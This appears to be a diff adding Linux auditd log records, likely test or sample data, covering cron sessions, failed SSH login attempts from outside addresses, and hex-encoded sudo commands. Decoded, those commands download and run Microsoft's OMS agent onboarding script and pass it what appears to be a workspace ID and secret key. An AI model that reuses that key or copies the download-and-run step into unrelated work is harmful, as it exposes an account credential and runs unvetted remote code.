+type=LOGIN msg=audit(1551486601.205:546): pid=17862 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=270 res=1
+type=USER_START msg=audit(1551486601.205:547): pid=17862 uid=0 auid=0 ses=270 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_START msg=audit(1551486601.205:548): pid=17861 uid=0 auid=998 ses=269 subj==unconfined msg='op=PAM:session_open acct="omsagent" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486601.209:549): pid=17863 uid=0 auid=0 ses=267 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486601.209:550): pid=17863 uid=0 auid=0 ses=267 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486601.229:551): pid=17860 uid=0 auid=0 ses=268 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486601.229:552): pid=17860 uid=0 auid=0 ses=268 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486601.237:553): pid=17862 uid=0 auid=0 ses=270 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486601.237:554): pid=17862 uid=0 auid=0 ses=270 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486619.289:555): pid=17861 uid=0 auid=998 ses=269 subj==unconfined msg='op=PAM:setcred acct="omsagent" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486619.289:556): pid=17861 uid=0 auid=998 ses=269 subj==unconfined msg='op=PAM:session_close acct="omsagent" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_CMD msg=audit(1551486631.701:557): pid=17969 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=776765742068747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D6963726F736F66742F4F4D532D4167656E742D666F722D4C696E75782F6D61737465722F696E7374616C6C65722F736372697074732F6F6E626F6172645F6167656E742E7368 terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551486631.701:558): pid=17969 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551486631.701:559): pid=17969 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_END msg=audit(1551486631.713:560): pid=17969 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551486631.713:561): pid=17969 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_CMD msg=audit(1551486658.697:562): pid=18009 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=776765742068747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D6963726F736F66742F4F4D532D4167656E742D666F722D4C696E75782F6D61737465722F696E7374616C6C65722F736372697074732F6F6E626F6172645F6167656E742E7368 terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551486658.697:563): pid=18009 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551486658.697:564): pid=18009 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_END msg=audit(1551486658.721:565): pid=18009 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551486658.721:566): pid=18009 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_CMD msg=audit(1551486658.725:567): pid=18011 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=7368206F6E626F6172645F6167656E742E7368202D772033333532303866642D386231642D346463612D613639622D363736303864393464653563202D73204E49357A37556668484B773759352B752F6C63412F6866754C46647233312F55373541433070496B7657626D414C434E75533369513138755676584F2B536737386552725A4661714933735A462F43433054726D45413D3D202D64206F70696E7369676874732E617A7572652E636F6D terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551486658.725:568): pid=18011 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551486658.725:569): pid=18011 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_ACCT msg=audit(1551486661.293:570): pid=18051 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486661.293:571): pid=18051 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486661.293:572): pid=18051 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=271 res=1
+type=USER_START msg=audit(1551486661.293:573): pid=18051 uid=0 auid=0 ses=271 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486661.293:574): pid=18051 uid=0 auid=0 ses=271 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486661.293:575): pid=18051 uid=0 auid=0 ses=271 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=SERVICE_START msg=audit(1551486664.633:576): pid=1 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='unit=omid comm="systemd" exe="/lib/systemd/systemd" hostname=? addr=? terminal=? res=success'
+type=SERVICE_STOP msg=audit(1551486664.633:577): pid=1 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='unit=omid comm="systemd" exe="/lib/systemd/systemd" hostname=? addr=? terminal=? res=success'
+type=SERVICE_START msg=audit(1551486664.701:578): pid=1 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='unit=omid comm="systemd" exe="/lib/systemd/systemd" hostname=? addr=? terminal=? res=success'
+type=USER_LOGIN msg=audit(1551486665.205:579): pid=18166 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct=28756E6B6E6F776E207573657229 exe="/usr/sbin/sshd" hostname=? addr=93.47.130.237 terminal=sshd res=failed'
+type=USER_LOGIN msg=audit(1551486665.205:580): pid=18166 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct=28696E76616C6964207573657229 exe="/usr/sbin/sshd" hostname=? addr=93.47.130.237 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551486667.581:581): pid=18166 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="admin" exe="/usr/sbin/sshd" hostname=93.47.130.237 addr=93.47.130.237 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551486667.581:582): pid=18166 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct=28696E76616C6964207573657229 exe="/usr/sbin/sshd" hostname=? addr=93.47.130.237 terminal=sshd res=failed'
+type=DAEMON_END msg=audit(1551486669.525:7508): op=terminate auid=0 pid=1 subj==unconfined res=success
+type=DAEMON_START msg=audit(1551486669.543:3571): op=start ver=2.8.2 format=raw kernel=4.18.0-1011-azure auid=4294967295 pid=18348 uid=0 ses=4294967295 subj=unconfined  res=success
+type=CONFIG_CHANGE msg=audit(1551486669.573:588): audit_backlog_limit=8192 old=8192 auid=4294967295 ses=4294967295 subj==unconfined res=1
+type=CONFIG_CHANGE msg=audit(1551486669.573:589): audit_failure=1 old=1 auid=4294967295 ses=4294967295 subj==unconfined res=1
+type=CONFIG_CHANGE msg=audit(1551486669.573:590): audit_backlog_wait_time=0 old=0 auid=4294967295 ses=4294967295 subj==unconfined res=1
+type=SERVICE_START msg=audit(1551486669.573:591): pid=1 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='unit=auditd comm="systemd" exe="/lib/systemd/systemd" hostname=? addr=? terminal=? res=success'
+type=USER_END msg=audit(1551486669.661:592): pid=18011 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551486669.661:593): pid=18011 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_ACCT msg=audit(1551486721.294:594): pid=18436 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486721.294:595): pid=18436 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486721.294:596): pid=18436 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=272 res=1
+type=USER_START msg=audit(1551486721.298:597): pid=18436 uid=0 auid=0 ses=272 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486721.298:598): pid=18436 uid=0 auid=0 ses=272 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486721.298:599): pid=18436 uid=0 auid=0 ses=272 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551486781.306:600): pid=18496 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486781.306:601): pid=18496 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486781.306:602): pid=18496 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=273 res=1
+type=USER_START msg=audit(1551486781.306:603): pid=18496 uid=0 auid=0 ses=273 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486781.306:604): pid=18496 uid=0 auid=0 ses=273 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486781.306:605): pid=18496 uid=0 auid=0 ses=273 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_LOGIN msg=audit(1551486817.202:606): pid=18539 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct=28756E6B6E6F776E207573657229 exe="/usr/sbin/sshd" hostname=? addr=93.47.130.237 terminal=sshd res=failed'
+type=USER_LOGIN msg=audit(1551486817.202:607): pid=18539 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct=28696E76616C6964207573657229 exe="/usr/sbin/sshd" hostname=? addr=93.47.130.237 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551486819.110:608): pid=18539 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="ubnt" exe="/usr/sbin/sshd" hostname=93.47.130.237 addr=93.47.130.237 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551486819.110:609): pid=18539 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct=28696E76616C6964207573657229 exe="/usr/sbin/sshd" hostname=? addr=93.47.130.237 terminal=sshd res=failed'
+type=USER_ACCT msg=audit(1551486841.310:610): pid=18562 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486841.310:611): pid=18562 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486841.310:612): pid=18562 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=274 res=1
+type=USER_START msg=audit(1551486841.310:613): pid=18562 uid=0 auid=0 ses=274 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486841.310:614): pid=18562 uid=0 auid=0 ses=274 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486841.310:615): pid=18562 uid=0 auid=0 ses=274 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551486901.314:616): pid=18622 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486901.314:617): pid=18622 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486901.314:618): pid=18622 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=275 res=1
+type=USER_ACCT msg=audit(1551486901.314:619): pid=18621 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486901.314:620): pid=18621 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486901.314:621): pid=18621 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=276 res=1
+type=USER_START msg=audit(1551486901.318:622): pid=18622 uid=0 auid=0 ses=275 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_START msg=audit(1551486901.318:623): pid=18621 uid=0 auid=0 ses=276 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486901.318:624): pid=18622 uid=0 auid=0 ses=275 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486901.318:625): pid=18622 uid=0 auid=0 ses=275 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486901.334:626): pid=18621 uid=0 auid=0 ses=276 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486901.334:627): pid=18621 uid=0 auid=0 ses=276 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551486961.339:628): pid=18696 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486961.339:629): pid=18696 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486961.339:630): pid=18696 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=277 res=1
+type=USER_START msg=audit(1551486961.339:631): pid=18696 uid=0 auid=0 ses=277 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486961.343:632): pid=18696 uid=0 auid=0 ses=277 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486961.343:633): pid=18696 uid=0 auid=0 ses=277 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551487021.343:634): pid=18756 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551487021.343:635): pid=18756 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551487021.343:636): pid=18756 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=278 res=1
+type=USER_START msg=audit(1551487021.347:637): pid=18756 uid=0 auid=0 ses=278 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551487021.347:638): pid=18756 uid=0 auid=0 ses=278 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551487021.347:639): pid=18756 uid=0 auid=0 ses=278 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_AUTH msg=audit(1551487029.987:640): pid=18763 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=37.113.154.69 addr=37.113.154.69 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551487029.987:641): pid=18763 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=37.113.154.69 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551487032.283:642): pid=18763 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=37.113.154.69 addr=37.113.154.69 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551487032.283:643): pid=18763 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=37.113.154.69 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551487034.187:644): pid=18763 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=37.113.154.69 addr=37.113.154.69 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551487034.187:645): pid=18763 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=37.113.154.69 terminal=sshd res=failed'
+type=USER_CMD msg=audit(1551487034.967:646): pid=18773 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=7461696C202F7661722F6C6F672F61756469742F6175646974642E6C6F67 terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551487034.967:647): pid=18773 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551487034.971:648): pid=18773 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_END msg=audit(1551487034.971:649): pid=18773 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551487034.971:650): pid=18773 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_AUTH msg=audit(1551487036.035:651): pid=18763 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=37.113.154.69 addr=37.113.154.69 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551487036.035:652): pid=18763 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=37.113.154.69 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551487038.155:653): pid=18763 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=37.113.154.69 addr=37.113.154.69 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551487038.155:654): pid=18763 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=37.113.154.69 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551487039.883:655): pid=18763 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=37.113.154.69 addr=37.113.154.69 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551487039.883:656): pid=18763 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=37.113.154.69 terminal=sshd res=failed'
+type=USER_ACCT msg=audit(1551487081.351:657): pid=18821 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551487081.351:658): pid=18821 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551487081.351:659): pid=18821 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=279 res=1
+type=USER_START msg=audit(1551487081.351:660): pid=18821 uid=0 auid=0 ses=279 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551487081.351:661): pid=18821 uid=0 auid=0 ses=279 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551487081.351:662): pid=18821 uid=0 auid=0 ses=279 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_CMD msg=audit(1551487125.972:663): pid=18868 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=617564697463746C202D6C terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551487125.972:664): pid=18868 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551487125.972:665): pid=18868 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_END msg=audit(1551487125.972:666): pid=18868 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551487125.972:667): pid=18868 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_ACCT msg=audit(1551487141.356:668): pid=18884 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551487141.356:669): pid=18884 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551487141.356:670): pid=18884 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=280 res=1
+type=USER_START msg=audit(1551487141.356:671): pid=18884 uid=0 auid=0 ses=280 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551487141.360:672): pid=18884 uid=0 auid=0 ses=280 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551487141.360:673): pid=18884 uid=0 auid=0 ses=280 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551487201.360:674): pid=18947 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551487201.360:675): pid=18947 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551487201.360:676): pid=18947 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=281 res=1
+type=USER_ACCT msg=audit(1551487201.360:677): pid=18948 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551487201.360:678): pid=18948 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_START msg=audit(1551487201.364:679): pid=18947 uid=0 auid=0 ses=281 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551487201.364:680): pid=18948 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=282 res=1
+type=USER_START msg=audit(1551487201.364:681): pid=18948 uid=0 auid=0 ses=282 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551487201.368:682): pid=18948 uid=0 auid=0 ses=282 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551487201.368:683): pid=18948 uid=0 auid=0 ses=282 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551487201.384:684): pid=18947 uid=0 auid=0 ses=281 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551487201.384:685): pid=18947 uid=0 auid=0 ses=281 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551487261.384:686): pid=19009 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551487261.384:687): pid=19009 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
